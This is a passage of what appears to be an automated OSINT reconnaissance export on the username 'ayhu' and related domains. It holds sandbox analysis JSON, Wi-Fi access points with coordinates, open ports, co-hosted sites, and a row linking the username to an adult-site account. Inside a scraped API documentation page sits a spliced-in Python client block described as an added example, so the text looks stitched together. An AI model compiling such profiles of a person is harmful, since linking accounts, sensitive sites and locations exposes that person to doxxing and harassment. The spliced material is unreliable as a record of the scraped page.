"wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-stable.json")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, 
Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""cousinssubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""hockeymonkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""4amscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-stable.json, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\throttle_store.dat"\n "msedge.exe" reads file 
"c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\settings.dat"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\local state"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\variations"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\settings.dat"\n "msedge.exe" writes file "\\device\\namedpipe\\wkssvc"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\variations"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\last version"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\vpn tokens-journal"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\1340_2075243144\\shopping.js]- [targetUID: 00000000-00001340]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00001340]\n "wallet-pre-stable.json" has type "ASCII text"- [targetUID: N/A]\n "wallet.bundle.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n 
"edge_driver.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%TEMP%\\1340_2106655350\\edge_driver.js]- [targetUID: 00000000-00001340]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\1340_2075243144\\edge_driver.js]- [targetUID: 00000000-00001340]\n "vendor.bundle.js" has type "ASCII text with very long lines"- Location: [%TEMP%\\1340_2106655350\\vendor.bundle.js]- [targetUID: 00000000-00001340]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00001340]\n "wallet-drawer.bundle.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "auto_open_controller.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\1340_2075243144\\auto_open_controller.js]- [targetUID: 00000000-00001340]\n "000009.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgeCoupons\\coupons_data.db\\000009.log]- [targetUID: 00000000-00001340]\n "000013.ldb" has type "data"- [targetUID: N/A]\n "bnpl.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\1340_2106655350\\bnpl\\bnpl.bundle.js]- [targetUID: 00000000-00001340]\n "tokenized-card.bundle.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "edge_checkout_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\1340_2075243144\\edge_checkout_page_validator.js]- [targetUID: 00000000-00001340]\n "edge_confirmation_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\1340_2075243144\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00001340]\n "product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: 
[%TEMP%\\1340_2075243144\\product_page.js]- [targetUID: 00000000-00001340]\n "miniwallet.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "notification.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Asset Store\\assets.db\\000003.log]- [targetUI | 185.199.108.153 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | remraz wd pro 2g (Net ID: 00:00:C0:01:7B:3F) | 52.3759, 4.8975 |
| 2023-05-12 03:24:22 | Linked URL - Internal | No | Web Spider | 1 | 0 | 2 | 0 | None | https://ayhu.xyz/ | http://ayhu.xyz/ |
| 2023-05-12 02:55:52 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://fakeyou.com/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"fakeyou.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"fakeyou.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar207B.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.196.30.220:80"\n "104.196.30.220:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': 
u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "IsoScope_b04_IE_EarlyTabStart_0xeac_Mutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_b04_IESQMMUTEX_0_519"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_b04_IESQMMUTEX_0_303"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_b04_ConnHashTable<2820>_HashTable_Mutex"\n "IsoScope_b04_IESQMMUTEX_0_331"\n "Local\\ZonesCacheCounterMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2820"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b04_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab207A.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, 
u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "urlref_httpfakeyou.com" has type "data"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003088]\n "_87BE6B54-B749-11ED-AC3C-080027FE9315_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "NewErrorPageTemplate_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "Cab207A.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab207A.tmp]- [targetUID: 00000000-00003088]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "RecoveryStore._7CF0C385-B749-11ED-AC3C-080027FE9315_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFDAD5417A26E3E872.TMP" has type "data"- Location: [%TEMP%\\~DFDAD5417A26E3E872.TMP]- [targetUID: 00000000-00002820]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "42VPP0D5.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\42VPP0D5.txt]- [targetUID: 00000000-00002820]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002820]\n "OPUDGCZY.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\OPUDGCZY.txt]- [targetUID: 00000000-00002820]\n "Tar207B.tmp" has type "data"- Location: [%TEMP%\\Tar207B.tmp]- [targetUID: 
00000000-00003088]\n "HVIM856A.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\HVIM856A.txt]- [targetUID: 00000000-00002820]\n "J0B825KS.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\J0B825KS.txt]- [targetUID: 00000000-00002820]\n "33YQJ8LX.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\33YQJ8LX.txt]- [targetUID: 00000000-00002820]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "ZMP638A7.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ZMP638A7.txt]- [targetUID: 00000000-00002820]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: fakeyou.com"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://fakeyou.com/"\n Pattern match: "http://fakeyou.com"\n Heuristic match: "fakeyou.com"\n Heuristic match: "GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: fakeyou.com"'}, {u'category': u'External Systems', u'origin': 
u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/90 Antivirus vendors marked sample as malicious (0% detection rate)'}], u'threat_level': 0, u'size': None, u'job_id': u'63fdd56ace3ff76e250d8f82', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'suspicious_identifiers': [], u'attck_id': u'T1105', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Ingress Tool Transfer', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'suspicious_identifiers': [], u'attck_id': u'T1573', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Encrypted Channel', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'suspicious_identifiers': [], u'attck_id': u'T1071', u'malicious_identifiers': [], 
u'malicious_identifiers_count': 0, u'technique': u'Application Layer Protocol', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'104.196.30.220', u'104.196.30.220'], u'sha256': u'2a96acb6a11ab86bced4aba33d700808a6df7486ededb0db3e75f1d8e | 104.196.30.220 |
| 2023-05-12 03:15:36 | Physical Location | No | ipstack | 0 | 0 | 3 | 0 | None | Germany | 207.154.228.169 |
| 2023-05-12 03:00:49 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0-experiments.github.io | 185.199.111.153 |
| 2023-05-12 03:15:35 | Web Content Language | No | Language Detector | 0 | 0 | 3 | 0 | None | English | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<link rel="iron" href="https://cdn.discordapp.com/avatars/710143953533403226/02ca825e4901e74c2c2d6f8e59341325.png?size=512" sizes="512x512" type="image/png" />
<meta property="og:title" content="SkyHelper API - Documentation" />
<meta property="og:image" content="https://cdn.discordapp.com/avatars/710143953533403226/02ca825e4901e74c2c2d6f8e59341325.png?size=512" />
<meta property="oh.theme-color" content="#3585d0" />
<meta property="og:description" content="A hypixel skyblock API wrapper containing most features that the SkyHelper bot has to offer." />
<title>SkyHelper API - Documentation</title>
<link rel="stylesheet" href="https://stackedit.io/style.css" />
</head>
<body class="stackedit">
<div class="stackedit__html">
<h1 id="skyhelper-api">SkyHelper API</h1>
<h1 id="authentication">Authentication</h1>
<p>
The SkyHelper API uses its own API keys to authenticate requests. You can either host this API on your own server and define keys there, or subscribe to the SkyHelper
<a href="https://www.patreon.com/skyhelper">Patreon</a> (Silver or Gold Supporter) to get an API key from me.<br />
You can pass the key either as a query parameter, by appending
<code>?key=token</code> to the request URL, or as an <code>Authorization</code> header whose value is your API
token.
</p>
<h1 id="responses">Responses</h1>
<p>
All endpoints return JSON. Every response contains a <code>status</code> key matching the HTTP status code that was returned, plus a
<code>data</code> key for successful responses. Failed requests return a <code>reason</code> key instead.
</p>
<table>
<thead>
<tr>
<th>Status Code</th>
<th>Reason</th>
</tr>
</thead>
<tbody>
<tr>
<td>200</td>
<td>Successful request</td>
</tr>
<tr>
<td>400</td>
<td>
The request is missing an authentication method (a valid
<code>key</code> query parameter or an <code>Authorization</code> header)
</td>
</tr>
<tr>
<td>403</td>
<td>The provided token does not exist</td>
</tr>
<tr>
<td>404</td>
<td>There is no player with the given UUID or name or the player has no SkyBlock profiles</td>
</tr>
<tr>
<td>429</td>
<td>
The Hypixel API rate-limit was reached (The API will return
<code>RateLimit-Remaining</code> and <code>RateLimit-Reset</code> headers)
</td>
</tr>
<tr>
<td>500</td>
<td>
There was an error in the SkyHelper API or the Hypixel API returned an unknown error code. Please report these errors back on
<a href="https://github.com/Altpapier/SkyHelperAPI/issues">GitHub</a>
</td>
</tr>
<tr>
<td>502</td>
<td>Hypixel's API is experiencing technical issues or is unavailable</td>
</tr>
<tr>
<td>503</td>
<td>Hypixel's API is in maintenance mode</td>
</tr>
<tr>
<td>504</td>
<td>Hypixel's API returned a <code>Gateway Time-out</code> error</td>
</tr>
</tbody>
</table>
<h1 id="endpoints">Endpoints</h1>
<h3 id="get-v2networth"><code>POST</code> /v2/networth</h3>
<table>
<thead>
<tr>
<th>Field</th>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>profileData</td>
<td>Object</td>
<td>The profile player data from the Hypixel API (profile.members[uuid])</td>
</tr>
<tr>
<td>bankBalance</td>
<td>Number</td>
<td>The player's bank balance from the Hypixel API (profile.banking?.balance)</td>
</tr>
<tr>
<td>onlyNetworth</td>
<td>Boolean</td>
<td>(default: false) If true, only the networth will be returned</td>
</tr>
</tbody>
</table>
<h3 id="post-v2networthitem"><code>POST</code> /v2/networth/item</h3>
<table>
<thead>
<tr>
<th>Field</th>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>itemData</td>
<td>Object</td>
<td>The parsed item data of an item from the profiles endpoint</td>
</tr>
</tbody>
</table>
<h3 id="get-v2profilesuser"><code>GET</code> /v2/profiles/:user</h3>
<h3 id="get-v2profileuserprofile"><code>GET</code> /v2/profile/:user/:profile</h3>
<h3 id="get-v1profilesuser"><code>GET</code> /v1/profiles/:user</h3>
<h3 id="get-v1profileuserprofile"><code>GET</code> /v1/profile/:user/:profile</h3>
<h3 id="get-v1profilesuseritems"><code>GET</code> /v1/items/:user</h3>
<h3 id="get-v1profileuserprofileitems"><code>GET</code> /v1/items/:user/:profile</h3>
<h3 id="get-v1fetchur"><code>GET</code> /v1/fetchur</h3>
<table>
<thead>
<tr>
<th>Parameter</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>user</td>
<td>The user's UUID or name</td>
</tr>
<tr>
<td>profile</td>
<td>The user's profile ID or name</td>
</tr>
</tbody>
</table>
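<p>The following client sketch is an added example written for this page; it is not code from the SkyHelper API project. It exercises the two authentication methods from the Authentication section and maps the response envelope (<code>status</code>, <code>data</code>, <code>reason</code>) and the <code>RateLimit-*</code> headers from the Responses table onto Python values. The base URL, the function names and the error class are assumptions for illustration; the documentation above does not give a base URL. The header form is the default because a token in a query string is recorded in proxy and web-server access logs, browser history and <code>Referer</code> headers, which an <code>Authorization</code> header normally avoids.</p>

```python
"""Added example: minimal SkyHelper API client following the documented
authentication methods and response envelope. Not the project's own code."""
import json
import urllib.error
import urllib.parse
import urllib.request

# Assumed placeholder: the documentation does not state a base URL.
BASE_URL = "https://example.invalid"


class SkyHelperError(Exception):
    """Raised for any documented non-200 outcome, carrying the body's reason."""

    def __init__(self, status, reason, retry_after=None):
        super().__init__(f"{status}: {reason}")
        self.status = status
        self.reason = reason
        self.retry_after = retry_after  # RateLimit-Reset value on 429, else None


def build_request(path, token, use_header=True, base_url=BASE_URL):
    """Return a urllib Request for `path`, authenticated either via the
    Authorization header (preferred) or the documented `?key=` parameter."""
    url = urllib.parse.urljoin(base_url, path)
    headers = {"Accept": "application/json"}
    if use_header:
        # Value is the bare token, exactly as the documentation specifies.
        headers["Authorization"] = token
    else:
        # Query-string variant; avoid it where possible since the token
        # will appear in access logs, history and Referer headers.
        sep = "&" if "?" in url else "?"
        url = f"{url}{sep}{urllib.parse.urlencode({'key': token})}"
    return urllib.request.Request(url, headers=headers)


def parse_response(status, headers, body):
    """Interpret a response according to the documented envelope.

    Returns the `data` value on 200. Raises SkyHelperError for anything else,
    including bodies that are not JSON or whose `status` disagrees with the
    HTTP status (for example an HTML error page from a proxy in front of
    the API, which would otherwise be mistaken for a successful response).
    """
    try:
        payload = json.loads(body)
    except ValueError:
        raise SkyHelperError(status, "non-JSON response body")
    if not isinstance(payload, dict):
        raise SkyHelperError(status, "unexpected JSON shape")
    body_status = payload.get("status")
    if body_status != status:
        raise SkyHelperError(
            status, f"body status {body_status!r} does not match HTTP status {status}")
    if status == 200:
        if "data" not in payload:
            raise SkyHelperError(status, "success response without data key")
        return payload["data"]
    # Failed request: surface the server's reason; on 429 also expose the
    # RateLimit-Reset header the documentation says is returned.
    reason = payload.get("reason", "no reason given")
    retry_after = None
    if status == 429:
        lower = {k.lower(): v for k, v in headers.items()}  # header names are case-insensitive
        retry_after = lower.get("ratelimit-reset")
    raise SkyHelperError(status, reason, retry_after)


def fetch(path, token, timeout=10):
    """Perform the request. urllib raises HTTPError for 4xx/5xx, so both
    branches feed the same envelope parser."""
    req = build_request(path, token)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return parse_response(resp.status, dict(resp.headers),
                                  resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as err:
        return parse_response(err.code, dict(err.headers),
                              err.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    # Offline demonstration on constructed responses (no network access).
    print(parse_response(200, {}, '{"status": 200, "data": {"profiles": []}}'))
    try:
        parse_response(429, {"RateLimit-Reset": "30"},
                       '{"status": 429, "reason": "Hypixel rate limit reached"}')
    except SkyHelperError as exc:
        print(exc, "retry after", exc.retry_after)
```

<p>The status mismatch check is the part worth keeping even in a throwaway client: the documentation promises that the body's <code>status</code> equals the HTTP code, so a disagreement means the response did not come from the API's normal path and must not be treated as player data.</p>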
<h1 id="networthcalculationtypes">Networth Calculation Types</h1>
<p>Types that are used to describe an item's calculation</p>
<table>
<thead>
<tr>
<th>Type</th>
</tr>
</thead>
<tbody>
<tr>
<td>essence</td>
</tr>
<tr>
<td>prestige</td>
</tr>
<tr>
<td>shens_auction</td>
</tr>
<tr>
<td>winning_bid</td>
</tr>
<tr>
<td>enchant</td>
</tr>
<tr>
<td>silex</td>
</tr>
<tr>
<td>wood_singularity</td>
</tr>
<tr>
<td>tuned_transmission</td>
</tr>
<tr>
<td>thunder_charge</td>
</tr>
<tr>
<td>rune</td>
</tr>
<tr>
<td>fuming_potato_book</td>
</tr>
<tr>
<td>hot_potato_book</td>
</tr>
<tr>
<td>dye</td>
</tr>
<tr>
<td>the_art_of_war</td>
</tr>
<tr>
<td>the_art_of_peace</td>
</tr>
<tr>
<td>farming_for_dummies</td>
</tr>
<tr>
<td>recombobulator_3000</td>
</tr>
<tr>
<td>gemstone</td>
</tr>
<tr>
<td>reforge</td>
</tr>
<tr>
<td>master_star</td>
</tr>
<tr>
<td>necron_scroll</td>
</tr>
<tr>
<td>gemstone_chamber</td>
</tr>
<tr>
<td>drill_part</td>
</tr>
<tr>
<td>etherwarp_conduit</td>
</tr>
<tr>
<td>pet_item</td>
</tr>
|
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:02:2D:04:09:0C) | 37.780462,-122.390564 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | TEO Network Enterprise (Net ID: 00:01:24:F0:B7:E1) | 37.7813933,-122.3918002 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Pornhub Users (Category: XXXPORNXXX)
https://www.pornhub.com/users/ayhu | ayhu |
| 2023-05-12 02:44:27 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Patreon | nwapi.battleb0t.xyz |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Sitecom67E1E4 (Net ID: 00:0C:F6:67:E1:E4) | 50.8897, 6.0563 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:04:5A:0E:F4:FC) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | WLAN (Net ID: 00:01:24:F2:68:C6) | 37.7813933,-122.3918002 |
| 2023-05-12 03:23:35 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.13:80 | 188.114.96.0/24 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Chili Bean Cafe (Net ID: 00:02:61:19:70:71) | 34.0544, -118.244 |
